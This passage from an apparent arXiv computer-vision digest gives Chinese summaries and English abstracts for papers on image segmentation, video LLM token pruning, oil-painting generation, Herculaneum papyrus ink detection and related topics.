Abstract:This work introduces a new approach to automatic oil painting that emphasizes the creation of dynamic and expressive brushstrokes. A pivotal challenge lies in mitigating the duplicate and common-place strokes, which often lead to less aesthetic outcomes. Inspired by the human painting process, \ie, observing, comparing, and drawing, we incorporate differential image analysis into a neural oil painting model, allowing the model to effectively concentrate on the incremental impact of successive brushstrokes. To operationalize this concept, we propose the Differential Query Transformer (DQ-Transformer), a new architecture that leverages differentially derived image representations enriched with positional encoding to guide the stroke prediction process. This integration enables the model to maintain heightened sensitivity to local details, resulting in more refined and nuanced stroke generation. Furthermore, we incorporate adversarial training into our framework, enhancing the accuracy of stroke prediction and thereby improving the overall realism and fidelity of the synthesized paintings. Extensive qualitative evaluations, complemented by a controlled user study, validate that our DQ-Transformer surpasses existing methods in both visual realism and artistic authenticity, typically achieving these results with fewer strokes. The stroke-by-stroke painting animations are available on our project website.
[CV-135] RAP: Retrieve Adapt and Prompt-Fit for Training-Free Few-Shot Medical Image Segmentation IJCNN2026
【速读】:该论文旨在解决少样本医学图像分割(Few-shot Medical Image Segmentation, FSMIS)中现有方法过度依赖稀疏标注的语义对应关系,而忽视了医学影像中目标解剖结构具有跨患者和采集设备重复出现的高频形态特征(如边界几何形状与空间布局)的问题。解决方案的关键在于提出一种无需训练的框架RAP,其核心创新包括:首先利用DINOv3特征从档案库中检索形态兼容的支持样本以降低单支持样本选择的脆弱性;其次通过拟合边界感知的结构线索将检索到的支持掩码适配至查询图像,生成在域偏移下仍保持解剖一致性的预掩码;最后基于Voronoi划分采样正点、扇形区域采样负点,将预掩码转化为提示输入Segment Anything Model 2(SAM2),实现无需微调的最终精修。该方法证明了显式结构拟合与检索增强提示相结合是实现鲁棒少样本医学图像分割的有效途径。
链接: https://arxiv.org/abs/2603.27705
作者: Zhihao Mao,Bangpu Chen
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注: This paper has been accepted by IJCNN 2026
Abstract:Few-shot medical image segmentation (FSMIS) has achieved notable progress, yet most existing methods mainly rely on semantic correspondences from scarce annotations while under-utilizing a key property of medical imagery: anatomical targets exhibit repeatable high-frequency morphology (e.g., boundary geometry and spatial layout) across patients and acquisitions. We propose RAP, a training-free framework that retrieves, adapts, and prompts Segment Anything Model 2 (SAM2) for FSMIS. First, RAP retrieves morphologically compatible supports from an archive using DINOv3 features to reduce brittleness in single-support choice. Second, it adapts the retrieved support mask to the query by fitting boundary-aware structural cues, yielding an anatomy-consistent pre-mask under domain shifts. Third, RAP converts the pre-mask into prompts by sampling positive points via Voronoi partitioning and negative points via sector-based sampling, and feeds them into SAM2 for final refinement without any fine-tuning. Extensive experiments on multiple medical segmentation benchmarks show that RAP consistently surpasses prior FSMIS baselines and achieves state-of-the-art performance. Overall, RAP demonstrates that explicit structural fitting combined with retrieval-augmented prompting offers a simple and effective route to robust training-free few-shot medical segmentation.
[CV-136] Ink Detection from Surface Topography of the Herculaneum Papyri
【速读】:该论文旨在解决赫库兰尼姆纸草卷(Herculaneum papyri)中碳基墨水在碳化纸张上难以通过X射线辐射成像或断层扫描识别的问题,因为两者均以碳为主,缺乏密度或成分差异带来的对比度。其解决方案的关键在于提出并验证了基于表面形貌(surface morphology)的判别机制:利用高分辨率三维光学轮廓测量数据训练机器学习模型,从机械展开的纸草卷中区分墨迹区域与未书写区域。研究表明,仅靠高分辨率地形信息即可提供可用于墨迹检测的有效信号,且分割性能随横向采样率降低而下降,揭示了需解析的空间尺度特征,从而为后续通过X射线断层扫描实现闭合卷轴的形态学读取提供了空间分辨率目标依据。
链接: https://arxiv.org/abs/2603.27698
作者: Giorgio Angelotti,Federica Nicolardi,Paul Henderson,W. Brent Seales
机构: Vesuvius Challenge, USA; Università degli Studi di Napoli Federico II, Italy; University of Glasgow, Scotland, UK; EduceLab, University of Kentucky, USA
类目: Computer Vision and Pattern Recognition (cs.CV); Digital Libraries (cs.DL)
备注: 9 pages, 3 figures, 2 tables. Currently under review
Abstract:Reading the Herculaneum papyri is challenging because both the scrolls and the ink, which is carbon-based, are carbonized. In X-ray radiography and tomography, ink detection typically relies on density- or composition-driven contrast, but carbon ink on carbonized papyrus provides little attenuation contrast. Building on the morphological hypothesis, we show that the surface morphology of written regions contains enough signal to distinguish ink from papyrus. To this end, we train machine learning models on three-dimensional optical profilometry from mechanically opened Herculaneum papyri to separate inked and uninked areas. We further quantify how lateral sampling governs learnability and how a native-resolution model behaves on coarsened inputs. We show that high-resolution topography alone contains a usable signal for ink detection. Diminishing segmentation performance with decreasing lateral resolution provides insight into the characteristic spatial scales that must be resolved on our dataset to exploit the morphological signal. These findings inform spatial resolution targets for morphology-based reading of closed scrolls through X-ray tomography.
[CV-137] Can Unsupervised Segmentation Reduce Annotation Costs for Video Semantic Segmentation?
【速读】:该论文旨在解决视频语义分割(Video Semantic Segmentation)任务中对大量精细像素级标注数据的依赖问题,这类标注成本高昂且耗时。为降低标注成本,论文提出利用未标注视频帧和粗粒度标注(Coarse Annotations)作为辅助资源,结合先进的分割基础模型——Segment Anything Model (SAM) 和 Segment Anything Model 2 (SAM 2),自动化生成掩码(Mask Generation),从而显著减少人工标注需求。其解决方案的关键在于:通过合理使用未标注数据与粗标注信息,配合SAM系列模型的强大泛化能力,可在保持相近性能的前提下将标注工作量减少约三分之一;同时研究发现,数据集中帧的多样性(Variety of Frames)比帧的数量(Number of Frames)对最终性能影响更大。
链接: https://arxiv.org/abs/2603.27697
作者: Samik Some,Vinay P. Namboodiri
机构: IIT Kanpur(印度理工学院坎普尔分校); University of Bath(巴斯大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Published in ICVGIP 2025
Abstract:Present-day deep neural networks for video semantic segmentation require a large number of fine-grained pixel-level annotations to achieve the best possible results. Obtaining such annotations, however, is very expensive. On the other hand, raw, unannotated video frames are practically free to obtain. Similarly, coarse annotations, which do not require precise boundaries, are also much cheaper. This paper investigates approaches to reduce the annotation cost required for video segmentation datasets by utilising such resources. We show that using state-of-the-art segmentation foundation models, Segment Anything Model (SAM) and Segment Anything Model 2 (SAM 2), we can utilise both unannotated frames as well as coarse annotations to alleviate the effort required for manual annotation of video segmentation datasets by automating mask generation. Our investigation suggests that if used appropriately, we can reduce the need for annotation by a third with similar performance for video semantic segmentation. More significantly, our analysis suggests that the variety of frames in the dataset is more important than the number of frames for obtaining the best performance.
[CV-138] Customized Visual Storytelling with Unified Multimodal LLM s CVPR CVPR2026
【速读】:该论文旨在解决现有故事生成方法在多模态条件控制下的局限性问题,即大多数方法仅依赖文本输入,缺乏对角色身份(character identity)和场景背景的联合建模能力,且难以实现镜头类型(shot type)等影视语法层面的可控生成。解决方案的关键在于提出VstoryGen框架,通过整合文本描述、角色参考图像与背景参考图像,实现多模态驱动的故事流生成;同时引入基于参数高效提示调优(parameter-efficient prompt tuning)的镜头类型控制机制,在电影数据上训练以增强生成序列的影视语法一致性与多样性,从而提升故事生成的连贯性与视觉表现力。
链接: https://arxiv.org/abs/2603.27690
作者: Wei-Hua Li,Cheng Sun,Chu-Song Chen
机构: National Taiwan University (国立台湾大学); NVIDA (英伟达)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Paper accepted to the CVPR 2026 Workshop on Generative AI for Storytelling (CVPRW)
Abstract:Multimodal story customization aims to generate coherent story flows conditioned on textual descriptions, reference identity images, and shot types. While recent progress in story generation has shown promising results, most approaches rely on text-only inputs. A few studies incorporate character identity cues (e.g., facial ID), but lack broader multimodal conditioning. In this work, we introduce VstoryGen, a multimodal framework that integrates descriptions with character and background references to enable customizable story generation. To enhance cinematic diversity, we introduce shot-type control via parameter-efficient prompt tuning on movie data, enabling the model to generate sequences that more faithfully reflect cinematic grammar. To evaluate our framework, we establish two new benchmarks that assess multimodal story customization from the perspectives of character and scene consistency, text-visual alignment, and shot-type control. Experiments demonstrate that VstoryGen achieves improved consistency and cinematic diversity compared to existing methods.
[CV-139] Gated Condition Injection without Multimodal Attention: Towards Controllable Linear-Attention Transformers
【速读】:该论文旨在解决基于扩散模型的可控图像生成在边缘设备上部署时面临的两大挑战:一是现有方法难以支持多种异构条件输入类型(如空间对齐与非对齐提示),二是传统控制框架(如ControlNet和OminiControl)在采用线性注意力架构(linear attention)的模型上收敛速度慢、效率低的问题。解决方案的关键在于提出一种专为线性注意力骨干网络(如SANA)设计的新型可控扩散框架,其核心是一个统一的门控条件模块(unified gated conditioning module),该模块通过双路径(dual-path)结构有效融合多类型条件输入,在保证生成质量的同时显著提升训练稳定性和收敛速度,从而实现高效且灵活的边缘端可控图像生成。
链接: https://arxiv.org/abs/2603.27666
作者: Yuhe Liu,Zhenxiong Tan,Yujia Hu,Songhua Liu,Xinchao Wang
机构: National University of Singapore (新加坡国立大学); Shanghai Jiao Tong University (上海交通大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Recent advances in diffusion-based controllable visual generation have led to remarkable improvements in image quality. However, these powerful models are typically deployed on cloud servers due to their large computational demands, raising serious concerns about user data privacy. To enable secure and efficient on-device generation, we explore in this paper controllable diffusion models built upon linear attention architectures, which offer superior scalability and efficiency, even on edge devices. Yet, our experiments reveal that existing controllable generation frameworks, such as ControlNet and OminiControl, either lack the flexibility to support multiple heterogeneous condition types or suffer from slow convergence on such linear-attention models. To address these limitations, we propose a novel controllable diffusion framework tailored for linear attention backbones like SANA. The core of our method lies in a unified gated conditioning module working in a dual-path pipeline, which effectively integrates multi-type conditional inputs, such as spatially aligned and non-aligned cues. Extensive experiments on multiple tasks and benchmarks demonstrate that our approach achieves state-of-the-art controllable generation performance based on linear-attention models, surpassing existing methods in terms of fidelity and controllability.
[CV-140] st-Time Instance-Specific Parameter Composition: A New Paradigm for Adaptive Generative Modeling CVPR2026
【速读】:该论文旨在解决现有生成式模型(Generative Models)在面对不同输入时缺乏灵活性的问题,即这些模型通常依赖固定的预训练参数来处理所有输入,无法根据具体感知或想象情境动态调整其内部表示。为应对这一局限,作者提出了一种名为Composer的新范式,其核心创新在于在推理阶段引入实例特定的参数组合机制(instance-specific parameter composition),通过生成与输入条件相关的参数适配(parameter adaptations),将其注入预训练模型权重中,从而实现无需微调或重新训练的逐输入特化。该方法仅需一次适配即可支持多步生成过程,在保持极低计算和内存开销的同时显著提升输出质量与上下文相关性,推动生成模型从静态参数化向动态适应性设计演进。
链接: https://arxiv.org/abs/2603.27665
作者: Minh-Tuan Tran,Xuan-May Le,Quan Hung Tran,Mehrtash Harandi,Dinh Phung,Trung Le
机构: Monash University (莫纳什大学); The University of Melbourne (墨尔本大学); Meta Inc (Meta公司)
类目: Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注: Accepted at CVPR 2026
Abstract:Existing generative models, such as diffusion and auto-regressive networks, are inherently static, relying on a fixed set of pretrained parameters to handle all inputs. In contrast, humans flexibly adapt their internal generative representations to each perceptual or imaginative context. Inspired by this capability, we introduce Composer, a new paradigm for adaptive generative modeling based on test-time instance-specific parameter composition. Composer generates input-conditioned parameter adaptations at inference time, which are injected into the pretrained model’s weights, enabling per-input specialization without fine-tuning or retraining. Adaptation occurs once prior to multi-step generation, yielding higher-quality, context-aware outputs with minimal computational and memory overhead. Experiments show that Composer substantially improves performance across diverse generative models and use cases, including lightweight/quantized models and test-time scaling. By leveraging input-aware parameter composition, Composer establishes a new paradigm for designing generative models that dynamically adapt to each input, moving beyond static parameterization.
[CV-141] LiDAR for Crowd Management: Applications Benefits and Future Directions
【速读】:该论文旨在解决公共安全场景下人群管理的智能化与精准化问题,其核心挑战在于如何高效、隐私友好且鲁棒地实现人群检测、计数、跟踪与行为分类。解决方案的关键在于利用激光雷达(LiDAR)技术的优势:相较于传统监控手段,LiDAR能够在多种天气条件下稳定运行,并提供高精度的三维空间信息,同时保障用户隐私(因其不采集可见光图像),从而为人群行为分析提供可靠的数据基础。此外,论文进一步提出四类关键任务的处理框架,并指出未来研究需聚焦于专用数据集构建、多传感器融合、人工智能算法集成及点云处理效率提升等方向,以推动LiDAR在实际公共安全应用中的落地。
链接: https://arxiv.org/abs/2603.27663
作者: Abdullah Khanfor(1),Chaima Zaghouani(2),Hakim Ghazzai(3),Ahmad Alsharoa(2),Gianluca Setti(3), ((1) the College of Computer Science and Information Systems, Najran University, (2) the College of Innovation amp; Technology, University of Michigan-Flint, (3) King Abdullah University of Science and Technology (KAUST))
机构: Najran University (纳杰兰大学); University of Michigan-Flint (密歇根大学弗林特分校); King Abdullah University of Science and Technology (阿卜杜拉国王科技大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: 8 pages, 5 figures, 1 table
Abstract:Light Detection and Ranging (LiDAR) technology offers significant advantages for effective crowd management. This article presents LiDAR technology and highlights its primary advantages over other monitoring technologies, including enhanced privacy, performance in various weather conditions, and precise 3D mapping. We present a general taxonomy of four key tasks in crowd management: crowd detection, counting, tracking, and behavior classification, with illustrative examples of LiDAR applications for each task. We identify challenges and open research directions, including the scarcity of dedicated datasets, sensor fusion requirements, artificial intelligence integration, and processing needs for LiDAR point clouds. This article offers actionable insights for developing crowd management solutions tailored to public safety applications.
[CV-142] A Benchmarking Methodology to Assess Open-Source Video Large Language Models in Automatic Captioning of News Videos
【速读】:该论文旨在解决新闻视频自动文本描述生成(automatic news video captioning)任务中缺乏系统性评估的问题,特别是针对当前主流视频大语言模型(Video Large Language Models, VidLLMs)在新闻领域表现的量化分析不足。其解决方案的关键在于构建了一个包含两个互补基准数据集(智利电视新闻语料库和BBC新闻语料库)的全面评测框架,并引入两种新颖的保真度指标——主题保真度评分(Thematic Fidelity Score, TFS)和实体保真度评分(Entity Fidelity Score, EFS),以克服传统词法和语义指标(如METEOR、ROUGE-L、BERTScore等)对表面形式依赖性强、忽视静态帧信息及过度关注功能词等问题,从而更准确地衡量生成摘要在主题结构保留与关键实体覆盖方面的质量。实验表明,Gemma~3在多数维度上表现最优,Qwen-VL次之,验证了所提方法的有效性。
链接: https://arxiv.org/abs/2603.27662
作者: David Miranda Paredes,Jose M. Saavedra,Marcelo Pizarro
机构: DeepCVL.ai; University of Desarrollo (智利大学德萨尔维多分校)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:News videos are among the most prevalent content types produced by television stations and online streaming platforms, yet generating textual descriptions to facilitate indexing and retrieval largely remains a manual process. Video Large Language Models (VidLLMs) offer significant potential to automate this task, but a comprehensive evaluation in the news domain is still lacking. This work presents a comparative study of eight state-of-the-art open-source VidLLMs for automatic news video captioning, evaluated on two complementary benchmark datasets: a Chilean TV news corpus (approximately 1,345 clips) and a BBC News corpus (9,838 clips). We employ lexical metrics (METEOR, ROUGE-L), semantic metrics (BERTScore, CLIPScore, Text Similarity, Mean Reciprocal Rank), and two novel fidelity metrics proposed in this work: the Thematic Fidelity Score (TFS) and Entity Fidelity Score (EFS). Our analysis reveals that standard metrics exhibit limited discriminative power for news video captioning due to surface-form dependence, static-frame insensitivity, and function-word inflation. TFS and EFS address these gaps by directly assessing thematic structure preservation and named-entity coverage in the generated captions. Results show that Gemma~3 achieves the highest overall performance across both datasets and most evaluation dimensions, with Qwen-VL as a consistent runner-up.
[CV-143] Amped: Adaptive Multi-stage Non-edge Pruning for Edge Detection
【速读】:该论文旨在解决基于Transformer的边缘检测方法在保持高像素级精度的同时,因输入分辨率提升导致计算量剧增、难以实际部署的问题。其解决方案的关键在于提出一种自适应多阶段非边缘剪枝框架(Adaptive Multi-stage non-edge Pruning framework for Edge Detection, Amped),通过早期识别并移除高置信度的非边缘token(non-edge tokens),显著降低计算复杂度(GFLOPs),同时几乎不损失检测性能(ODS F-measure仅下降0.4%)。此外,作者还设计了一个结构简洁但性能优异的Transformer模型Streamline Edge Detector (SED),进一步提升了效率与准确性之间的平衡。
链接: https://arxiv.org/abs/2603.27661
作者: Yuhan Gao,Xinqing Li,Xin He,Bing Li,Xinzhong Zhu,Ming-Ming Cheng,Yun Liu
机构: Nankai University (南开大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Edge detection is a fundamental image analysis task that underpins numerous high-level vision applications. Recent advances in Transformer architectures have significantly improved edge quality by capturing long-range dependencies, but this often comes with computational overhead. Achieving higher pixel-level accuracy requires increased input resolution, further escalating computational cost and limiting practical deployment. Building on the strong representational capacity of recent Transformer-based edge detectors, we propose an Adaptive Multi-stage non-edge Pruning framework for Edge Detection(Amped). Amped identifies high-confidence non-edge tokens and removes them as early as possible to substantially reduce computation, thus retaining high accuracy while cutting GFLOPs and accelerating inference with minimal performance loss. Moreover, to mitigate the structural complexity of existing edge detection networks and facilitate their integration into real-world systems, we introduce a simple yet high-performance Transformer-based model, termed Streamline Edge Detector(SED). Applied to both existing detectors and our SED, the proposed pruning strategy provides a favorable balance between accuracy and efficiency-reducing GFLOPs by up to 40% with only a 0.4% drop in ODS F-measure. In addition, despite its simplicity, SED achieves a state-of-the-art ODS F-measure of 86.5%. The code will be released.
[CV-144] V-CAST: Video Curvature-Aware Spatio-Temporal Pruning for Efficient Video Large Language Models
【速读】:该论文旨在解决视频大语言模型(VideoLLMs)在长视频上下文推理中因预填充阶段存在大量冗余视觉标记而导致的效率瓶颈问题。核心挑战在于现有令牌压缩方法在时空信息覆盖上的不足,尤其是通过粗粒度帧级分配或场景分割引入的不连续覆盖,以及在MRoPE风格离散(t,h,w)绑定下令牌合并导致的时空坐标错位。解决方案的关键是提出一种无需训练、可即插即用的剪枝策略V-CAST(Video Curvature-Aware Spatio-Temporal Pruning),其将令牌压缩建模为轨迹近似问题,引入基于曲率引导的时间分配模块以动态分配每帧令牌预算至语义转折点和事件边界,并采用双锚点空间选择机制保留高熵视觉证据而不依赖注意力机制,同时保持保留令牌原始坐标以维持位置对齐。
链接: https://arxiv.org/abs/2603.27650
作者: Xinying Lin,Xuyang Liu,Yiyu Wang,Teng Ma,Wenqi Ren
机构: Shenzhen Campus of Sun Yat-sen University (中山大学深圳校区); Shenzhen Loop Area Institute (深圳环区研究所); Sichuan University (四川大学); EPIC Lab, Shanghai Jiao Tong University (上海交通大学EPIC实验室)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Code: \url{ this https URL }
Abstract:Video large language models (VideoLLMs) show strong capability in video understanding, yet long-context inference is still dominated by massive redundant visual tokens in the prefill stage. We revisit token compression for VideoLLMs under a tight budget and identify a key bottleneck, namely insufficient spatio-temporal information coverage. Existing methods often introduce discontinuous coverage through coarse per-frame allocation or scene segmentation, and token merging can further misalign spatio-temporal coordinates under MRoPE-style discrete (t,h,w) bindings. To address these issues, we propose V-CAST (Video Curvature-Aware Spatio-Temporal Pruning), a training-free, plug-and-play pruning policy for long-context video inference. V-CAST casts token compression as a trajectory approximation problem and introduces a curvature-guided temporal allocation module that routes per-frame token budgets to semantic turns and event boundaries. It further adopts a dual-anchor spatial selection mechanism that preserves high-entropy visual evidence without attention intervention, while keeping retained tokens at their original coordinates to maintain positional alignment. Extensive experiments across multiple VideoLLMs of different architectures and scales demonstrate that V-CAST achieves 98.6% of the original performance, outperforms the second-best method by +1.1% on average, and reduces peak memory and total latency to 86.7% and 86.4% of vanilla Qwen3-VL-8B-Instruct.
[CV-145] OpenDPR: Open-Vocabulary Change Detection via Vision-Centric Diffusion-Guided Prototype Retrieval for Remote Sensing Imagery CVPR2026
【速读】:该论文旨在解决开放词汇变化检测(Open-vocabulary Change Detection, OVCD)中两大核心瓶颈问题:一是类别识别误差,源于视觉语言模型(Vision-Language Models, VLMs)基于图像-文本匹配机制在细粒度地物类别表征上的局限性;二是变化定位不准,由于视觉基础模型(Visual Foundation Models, VFMs)缺乏对变化区域的先验知识。解决方案的关键在于提出一种无需训练的、以视觉为中心的扩散引导原型检索框架 OpenDPR,其通过扩散模型离线构建目标类别的多样化原型,并在推理阶段于视觉空间内进行相似性检索,从而提升类别识别准确性;同时设计了一个空间到变化的弱监督模块 S2C,利用 VFMs 强大的空间建模能力来增强变化定位性能,集成预训练 S2C 后得到弱监督变体 OpenDPR-W,显著提升了 OVCD 在两种监督模式下的性能表现。
链接: https://arxiv.org/abs/2603.27645
作者: Qi Guo,Jue Wang,Yinhe Liu,Yanfei Zhong
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted by CVPR 2026
Abstract:Open-vocabulary change detection (OVCD) seeks to recognize arbitrary changes of interest by enabling generalization beyond a fixed set of predefined classes. We reformulate OVCD as a two-stage pipeline: first generate class-agnostic change proposals using visual foundation models (VFMs) such as SAM and DINOv2, and then perform category identification with vision-language models (VLMs) such as CLIP. We reveal that category identification errors are the primary bottleneck of OVCD, mainly due to the limited ability of VLMs based on image-text matching to represent fine-grained land-cover categories. To address this, we propose OpenDPR, a training-free vision-centric diffusion-guided prototype retrieval framework. OpenDPR leverages diffusion models to construct diverse prototypes for target categories offline, and to perform similarity retrieval with change proposals in the visual space during inference. The secondary bottleneck lies in change localization, due to the inherent lack of change priors in VFMs. To bridge this gap, we design a spatial-to-change weakly supervised change detection module named S2C to adapt their strong spatial modeling capabilities for change localization. Integrating the pretrained S2C into OpenDPR leads to an optional weakly supervised variant named OpenDPR-W, which further improves OVCD with minimal supervision. Experimental results on four benchmark datasets demonstrate that the proposed methods achieve state-of-the-art performance under both supervision modes. Code is available at this https URL.
[CV-146] OPRO: Orthogonal Panel-Relative Operators for Panel-Aware In-Context Image Generation CVPR2026
【速读】:该论文旨在解决预训练扩散Transformer在面板感知的上下文图像生成任务中,如何实现参数高效适配的问题。其核心挑战在于,在保持模型原有性能的前提下,引入少量可学习参数以适应不同面板(panel)间的条件差异,同时不破坏模型已有的内部特征几何结构和面板内合成行为。解决方案的关键在于:将可学习的、面向特定面板的正交算子(orthogonal operators)叠加到冻结的位置编码(positional encodings)上,从而在保证等距性(isometry)——即保留内部特征几何结构——和同面板不变性(same-panel invariance)——即维持预训练模型在单个面板内的合成特性——的基础上,实现对不同面板间关系的有效建模。该方法不依赖于特定的位置编码设计,具有跨多种位置编码机制的泛化能力,并显著提升了基于上下文图像的指令编辑(instructional editing)流水线的效果。
链接: https://arxiv.org/abs/2603.27637
作者: Sanghyeon Lee,Minwoo Lee,Euijin Shin,Kangyeol Kim,Seunghwan Choi,Jaegul Choo
机构: Korea Advanced Institute of Science and Technology (KAIST)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted to CVPR 2026. 16 pages, 9 figures. Includes Supplementary Material
Abstract:We introduce a parameter-efficient adaptation method for panel-aware in-context image generation with pre-trained diffusion transformers. The key idea is to compose learnable, panel-specific orthogonal operators onto the backbone’s frozen positional encodings. This design provides two desirable properties: (1) isometry, which preserves the geometry of internal features, and (2) same-panel invariance, which maintains the model’s pre-trained intra-panel synthesis behavior. Through controlled experiments, we demonstrate that the effectiveness of our adaptation method is not tied to a specific positional encoding design but generalizes across diverse positional encoding regimes. By enabling effective panel-relative conditioning, the proposed method consistently improves in-context image-based instructional editing pipelines, including state-of-the-art approaches.
[CV-147] ContraMap: Contrastive Uncertainty Mapping for Robot Environment Representation
【速读】:该论文旨在解决机器人感知中如何在预测场景结构的同时,准确识别出因观测稀疏或缺失而导致的不可靠区域的问题(即不确定性估计)。传统方法往往难以实时提供空间一致的不确定性量化,而贝叶斯方法计算成本高。解决方案的关键在于提出ContraMap——一种对比连续映射方法,通过引入显式的“不确定性类”(uncertainty class),利用合成噪声样本进行训练,将未观测区域建模为一个对比类别,从而实现无需贝叶斯推断即可联合完成环境预测与空间不确定性估计。该方法基于混合模型视角,证明不确定性类的概率是距离感知不确定性代理的单调函数,从而保证了不确定性估计的空间一致性与高效性。
链接: https://arxiv.org/abs/2603.27632
作者: Chi Cuong Le,Weiming Zhi
机构: University of Sydney (悉尼大学)
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Reliable robot perception requires not only predicting scene structure, but also identifying where predictions should be treated as unreliable due to sparse or missing observations. We present ContraMap, a contrastive continuous mapping method that augments kernel-based discriminative maps with an explicit uncertainty class trained using synthetic noise samples. This formulation treats unobserved regions as a contrastive class, enabling joint environment prediction and spatial uncertainty estimation in real time without Bayesian inference. Under a simple mixture-model view, we show that the probability assigned to the uncertainty class is a monotonic function of a distance-aware uncertainty surrogate. Experiments in 2D occupancy mapping, 3D semantic mapping, and tabletop scene reconstruction show that ContraMap preserves mapping quality, produces spatially coherent uncertainty estimates, and is substantially more efficient than Bayesian kernelmap baselines.
[CV-148] Clore: Interactive Pathology Image Segmentation with Click-based Local Refinement
【速读】:该论文旨在解决现有基于深度学习的交互式分割方法在病理图像分割中因依赖迭代全局更新而导致冗余重预测、难以捕捉细粒度结构或修正局部细微误差的问题。其解决方案的关键在于提出了一种基于点击的局部精炼(Click-based Local Refinement, Clore)流程,通过分层交互范式实现高效优化:初始点击用于驱动全局分割快速勾勒大目标区域,后续点击则聚焦于局部细节的逐步精炼,从而在减少交互次数的同时提升边界精度与细粒度分割能力。
链接: https://arxiv.org/abs/2603.27625
作者: Tiantong Wang,Minfan Zhao,Jun Shi,Hannan Wang,Yue Dai
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Recent advancements in deep learning-based interactive segmentation methods have significantly improved pathology image segmentation. Most existing approaches utilize user-provided positive and negative clicks to guide the segmentation process. However, these methods primarily rely on iterative global updates for refinement, which lead to redundant re-prediction and often fail to capture fine-grained structures or correct subtle errors during localized adjustments. To address this limitation, we propose the Click-based Local Refinement (Clore) pipeline, a simple yet efficient method designed to enhance interactive segmentation. The key innovation of Clore lies in its hierarchical interaction paradigm: the initial clicks drive global segmentation to rapidly outline large target regions, while subsequent clicks progressively refine local details to achieve precise boundaries. This approach not only improves the ability to handle fine-grained segmentation tasks but also achieves high-quality results with fewer interactions. Experimental results on four datasets demonstrate that Clore achieves the best balance between segmentation accuracy and interaction cost, making it an effective solution for efficient and accurate interactive pathology image segmentation.
[CV-149] You Only Erase Once: Erasing Anything without Bringing Unexpected Content CVPR2026
【速读】:该论文旨在解决生成式 AI(Generative AI)在图像中目标擦除任务中存在的问题,即现有基于扩散模型的方法由于缺乏足够的成对训练数据和对内容生成的显式约束,常在掩码区域内产生意外内容或伪影,破坏场景上下文的一致性。其解决方案的关键在于:1)利用仅包含大规模真实图像的非配对数据集训练目标擦除扩散模型;2)引入基于实体分割模型构建的杂项检测器(sundries detector)和上下文一致性损失(context coherence loss),以显式约束生成内容并保持周围环境的语义连贯性;3)采用扩散蒸馏策略训练少步数的擦除扩散模型,提升训练与推理效率。
链接: https://arxiv.org/abs/2603.27599
作者: Yixing Zhu,Qing Zhang,Wenju Xu,Wei-Shi Zheng
机构: Sun Yat-sen University (中山大学); Amazon; Stanford University (斯坦福大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted by CVPR2026
Abstract:We present YOEO, an approach for object erasure. Unlike recent diffusion-based methods which struggle to erase target objects without generating unexpected content within the masked regions due to lack of sufficient paired training data and explicit constraint on content generation, our method allows to produce high-quality object erasure results free of unwanted objects or artifacts while faithfully preserving the overall context coherence to the surrounding content. We achieve this goal by training an object erasure diffusion model on unpaired data containing only large-scale real-world images, under the supervision of a sundries detector and a context coherence loss that are built upon an entity segmentation model. To enable more efficient training and inference, a diffusion distillation strategy is employed to train for a few-step erasure diffusion model. Extensive experiments show that our method outperforms the state-of-the-art object erasure methods. Code will be available at this https URL.
[CV-150] STRIDE: When to Speak Meets Sequence Denoising for Streaming Video Understanding
【速读】:该论文旨在解决视频大语言模型(Video-LLM)在在线流式视频场景中缺乏主动激活机制的问题,即系统不仅需要判断何时响应,还需在连续到来的视频帧中实现时序一致且可靠的“何时说话”(when-to-speak)决策。解决方案的关键在于将主动激活建模为一种结构化序列建模问题,利用视频流中自然形成的跨度结构(span-structured activation patterns),通过一个轻量级掩码扩散模块(masked diffusion module)在滑动时间窗口内联合预测并迭代优化激活信号,从而提升响应的时序连贯性和可靠性。该方法被命名为STRIDE(Structured Temporal Refinement with Iterative DEnoising),在多个流式基准和下游模型上验证了其优越性。
链接: https://arxiv.org/abs/2603.27593
作者: Junho Kim,Hosu Lee,James M. Rehg,Minsu Kim,Yong Man Ro
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注: Project page: this https URL
Abstract:Recent progress in video large language models (Video-LLMs) has enabled strong offline reasoning over long and complex videos. However, real-world deployments increasingly require streaming perception and proactive interaction, where video frames arrive online and the system must decide not only what to respond, but also when to respond. In this work, we revisit proactive activation in streaming video as a structured sequence modeling problem, motivated by the observation that temporal transitions in streaming video naturally form span-structured activation patterns. To capture this span-level structure, we model activation signals jointly over a sliding temporal window and update them iteratively as new frames arrive. We propose STRIDE (Structured Temporal Refinement with Iterative DEnoising), which employs a lightweight masked diffusion module at the activation interface to jointly predict and progressively refine activation signals across the window. Extensive experiments on diverse streaming benchmarks and downstream models demonstrate that STRIDE shows more reliable and temporally coherent proactive responses, significantly improving when-to-speak decision quality in online streaming scenarios.
[CV-151] A Robust Low-Rank Prior Model for Structured Cartoon-Texture Image Decomposition with Heavy-Tailed Noise
【速读】:该论文旨在解决图像处理中卡通-纹理分解(cartoon-texture image decomposition)问题,尤其是在存在重尾噪声(heavy-tailed noise)时难以获得鲁棒分解结果的挑战。其解决方案的关键在于提出一种基于鲁棒低秩先验(robust low-rank prior)的模型:采用Huber损失函数作为数据保真项替代传统的ℓ₂-范数,以更好地适应重尾噪声分布;同时保留总变差(total variation, TV)和核范数(nuclear norm)分别用于刻画图像的光滑卡通成分与纹理成分。此外,作者设计了两种可实施的算子分裂算法,适配不同退化算子,从而在高强度重尾噪声下的图像恢复任务中展现出优越性能。
链接: https://arxiv.org/abs/2603.27579
作者: Weihao Tang,Hongjin He
机构: Ningbo University (宁波大学)
